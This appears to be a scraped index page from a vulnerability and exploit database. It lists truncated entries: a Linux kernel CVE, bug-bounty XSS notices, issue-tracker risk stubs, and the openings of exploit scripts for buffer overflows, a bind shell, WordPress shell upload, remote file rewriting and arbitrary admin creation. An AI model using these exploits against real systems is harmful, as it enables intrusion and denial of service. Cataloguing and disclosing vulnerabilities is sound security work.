CVE-2023-53047

In the Linux kernel, the following vulnerability has been resolved: tee: amdtee: fix race condition in amdteeopensession There is a potential race condition in amdteeopensession that may lead to use-after-free. For instance, in amdteeopensession after sess-sessmask is set, and before setting:...

CE Phoenix 1.0.8.20 Remote Code Execution

Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix EXPLOIT : import requests from bs4 import BeautifulSoup import sys impor...

Upgraded Q -> 2 from #215 [1679863603573]

Judge has assessed an item in Issue 215 as 2 risk. The relevant finding follows: L1 + L2 --- The text was updated successfully, but these errors were encountered: All reactions...

paint-inspector.com Cross Site Scripting vulnerability OBB-3172701

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

Upgraded Q -> M from #471 [1668464969039]

Judge has assessed an item in Issue 471 as M risk. The relevant finding follows: The whole report --- The text was updated successfully, but these errors were encountered: All reactions...

Upgraded Q -> M from 135 [1654503723748]

Judge has assessed an item in Issue 135 as Medium risk. The relevant finding follows: --- The text was updated successfully, but these errors were encountered: All reactions...

5 Themes for Product Security and Fostering Organizational Growth

In this article we would like to review what Raj Umadas, Product Security Manager at Compass, has shared during our recent webinar highlighting recurring themes that have led to impactful collaborations and organizational risk reduction. Product security ProdSec is crucial in the process of growi...

Cuckoo Clock v5.0 - Buffer Overflow

Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow Exploit Author: boku Date: 2020-02-14 Vendor Homepage: https://en.softonic.com/author/pxcompany Software Link: https://en.softonic.com/download/parallaxis-cuckoo-clock/windows/post-download Version: 5.0 Tested On: Windows 10 32-bit Recreate: 1...

ABRT sosreport Privilege Escalation

This module attempts to gain root privileges on RHEL systems with a vulnerable version of Automatic Bug Reporting Tool ABRT configured as the crash handler. sosreport uses an insecure temporary directory, allowing local users to write to arbitrary files CVE-2015-5287. This module uses a symlink...

kodak.com XSS vulnerability

Vulnerable URL: http://www.kodak.com/global/mul/digital/flash/giftguide/giftguide0710/guide/main.swf?xmlfile=http://nsa.is.spying-on.us/k.xml Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 31015 VIP website...

Wordpress Ajax Load More Plugin 2.8.1.1 Upload Shell Exploit

This Metasploit module exploits an arbitrary file upload in the WordPress Ajax Load More version 2.8.1.1. It allows you to upload arbitrary php files and get remote code execution. This Metasploit module has been tested successfully on WordPress Ajax Load More 2.8.0 with WordPress 4.1.3 on Ubuntu...

Magic Music Editor - .cda Denial of Service

No description provided by source. !/usr/bin/perl Exploit Title: Magic Music Editor .cda DOS Version : All Version Author : AtT4CKxT3rR0r1ST [email protected] Download : http://www.magic-video-software.com/magicmusiceditor/download.html Sp3C!4L Gr34T$ T0 h1ch4m my $file= DOS.cda; my $junk = \x41 x 8000...

Ofilter Player (skin.ini) Local Crash PoC

No description provided by source. !/usr/bin/perl Exploit Title: Ofilter Player skin.ini Local Crash PoC Author:Vulnerability Discovered By Rehan Ahmed [email protected] Tested On: WinXP SP2 my $boom=\x41 x 5000; my $file=skin1.ini; C:\Program Files\OfilterPlayer\skin open$FILE,$file; print $FILE...

Free CD to MP3 Converter 3.1 - Local Buffer Overflow

!usr/bin/perl Exploit Title: Exploit 0day Buffer Overflow Free CD to MP3 Converter 3.1 Date: 09\11\2010 Author: C4SS!0 G0M3S Software Link: http://www.eusing.com/Download/cdtomp3freeware.exe Version: 3.1 Tested on: WIN-XP SP3 Exploit Writted by C4SS!0 G0M3S Home: http://www.invasao.com.br E-mail:...

PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow

PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow !/usr/bin/env python IDEAL Administration 2009 v9.7 Local Buffer Overflow Exploit Found By: DrIDE Usage: Migrate - Open Migration Project - Bind Shell Download: www.pointdev.com Tested On: Windows XPSP3 windows/shellbindtcp - 696 byte...

MixSense 1.0.0.1 DJ Studio - .mp3 Crash

MixSense 1.0.0.1 DJ Studio - .mp3 Crash !/usr/bin/perl -w MixSense 1.0.0.1 DJ Studio .mp3 file Crash Vulnerability Exploit Founded and exploited by prodigy Contact: [email protected] Vendor: MixSense Usage to reproduce the bug: when you created the malicious file, open with Mixsense and...

Globsy 1.0 - Remote File Rewriting

!/usr/bin/php -q '".$filename."' could not be opened."; 39. fwrite$handle, $data or die"Write: The file '".$filename."' could not be writen."; $mode is $POST'mode' and $data = $POST'data' so you can rewrite or create any file / errorreporting0; iniset"defaultsockettimeout",5; $host =...

Pet Grooming Management System 2.0 - Arbitrary Add Admin

Pet Grooming Management System 2.0 - Arbitrary Add Admin !/usr/bin/perl use strict; use LWP::UserAgent; print "-+- Pet Grooming Management System ; print "\nEnter Usernamecreate your admin username: "; chompmy $user=; print "\nEnter Passwordcreate your admin password: "; chompmy $pass=; my $ua =...